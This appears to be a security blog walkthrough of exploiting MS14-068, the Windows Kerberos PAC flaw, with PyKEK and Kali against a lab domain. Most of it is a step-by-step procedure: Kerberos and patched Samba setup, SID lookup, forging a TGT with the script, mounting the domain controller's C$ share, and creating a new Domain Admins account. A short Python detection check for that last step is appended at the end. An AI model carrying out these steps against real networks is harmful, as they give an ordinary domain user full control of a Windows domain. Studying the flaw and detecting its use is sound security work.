Exploiting MS14-068 with PyKEK and Kali

Here’s a quick writeup of exploiting MS14-068 using PyKEK and Kali.

Kali Prepwork

Install and Configure Kerberos

Install kerberos:

apt-get install krb5-user krb5-config

Add the realm configuration to /etc/krb5.conf (the default_realm setting goes in the [libdefaults] section and the realm block in [realms]):

[libdefaults]
  default_realm = pwn3d.local

[realms]
  pwn3d.local = {
    kdc = dc1.pwn3d.local
    admin_server = dc1.pwn3d.local
    default_domain = pwn3d.local
  }

Point /etc/resolv.conf at the domain controller's DNS server so the Kerberos SRV records (e.g. _kerberos._tcp.*) resolve correctly.

According to the TrustedSec blog, you’ll need to sync time with the domain controller. During my testing I didn’t perform any syncing and had no issues.

Download, Compile and Install Samba

The Kali Samba package is missing many of the Samba tools, including several that are very useful for exploiting MS14-068. The build steps below are based on mubix’s blog post Dumping NTDS.dit Domain Hashes Using Samba.

Download Samba 4.1.0 and the replication only patch.

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

Extract the tarball.

tar zxvf samba-4.1.0.tar.gz
mkdir src
mv samba-4.1.0 src/

Add the replication only patch.

patch -p0 < samba-4.1.0_replication-only-patch.txt

Build and install Samba.

cd src/samba-4.1.0/
./configure   # generate the build configuration before running make
make -j 2 && make install


Determine the user's SID with rpcclient:

rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)

Supply the SID and the user principal to the PyKEK script and it builds the TGT:

# python ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d
  [+] Building AS-REQ for Done!
  [+] Sending AS-REQ to Done!
  [+] Receiving AS-REP from Done!
  [+] Parsing AS-REP from Done!
  [+] Building TGS-REQ for Done!
  [+] Sending TGS-REQ to Done!
  [+] Receiving TGS-REP from Done!
  [+] Parsing TGS-REP from Done!
  [+] Creating ccache file 'TGT_john.smith@pwn3d.local.ccache'... Done!

Move the generated ccache into the default credential cache location so it becomes your Kerberos TGT.

# mv TGT_john.smith@pwn3d.local.ccache /tmp/krb5cc_$UID


If all went well, you can now use kerberos to authenticate.

# smbclient -k -W pwn3d -U john.smith //dc1.pwn3d.local/C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \>

Create a new account and make it a member of the Domain Admins group using the samba4 utilities/example code.

./user_add dc1.pwn3d.local kerberpwn3d2 Password1 -W pwn3d -U john.smith -k

./group_adduser dc1.pwn3d.local "Domain Admins" kerberpwn3d2 -W pwn3d -U john.smith -k
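From the defender's side, the two commands above leave a recognisable trail on the domain controller: a user account is created (Security event 4720) and then added to Domain Admins (event 4728) minutes later by an account that should not hold that privilege. The following is an added example, not part of the original writeup, of a simple correlation check over constructed event records; the tuple layout and the sample events are assumptions for illustration, not a real log format.

```python
"""Flag 'account created, then added to Domain Admins shortly after' sequences.

Windows Security event IDs used: 4720 = user account created,
4728 = member added to a security-enabled global group.
"""
from datetime import datetime, timedelta

# Constructed sample events (not real log data):
# (event_id, timestamp, subject_account, target_account, group_name)
SAMPLE_EVENTS = [
    ("4624", "2014-12-09T10:00:05", "john.smith", "", ""),
    ("4720", "2014-12-09T10:01:10", "john.smith", "kerberpwn3d2", ""),
    ("4728", "2014-12-09T10:01:45", "john.smith", "kerberpwn3d2", "Domain Admins"),
    ("4720", "2014-12-09T11:30:00", "helpdesk.svc", "newhire01", ""),
    ("4728", "2014-12-10T09:00:00", "admin.ops", "newhire01", "Marketing"),
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def find_create_then_escalate(events, window=timedelta(minutes=10),
                              group="Domain Admins", allowed_admins=frozenset()):
    """Return (creator, new_account) pairs where an account was created (4720)
    and added to `group` (4728) within `window`, unless the creator is in
    `allowed_admins` (accounts expected to perform such changes)."""
    created = {}   # new account name -> (creation time, creating subject)
    hits = []
    for eid, ts, subject, target, grp in sorted(events, key=lambda e: e[1]):
        t = parse_ts(ts)
        if eid == "4720":
            created[target] = (t, subject)
        elif eid == "4728" and grp == group and target in created:
            t0, creator = created[target]
            if t - t0 <= window and creator not in allowed_admins:
                hits.append((creator, target))
    return hits


if __name__ == "__main__":
    for creator, account in find_create_then_escalate(SAMPLE_EVENTS):
        print(f"ALERT: {creator} created {account} and added it to Domain Admins")
```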


Tags: pykek, kali, samba, MS14-068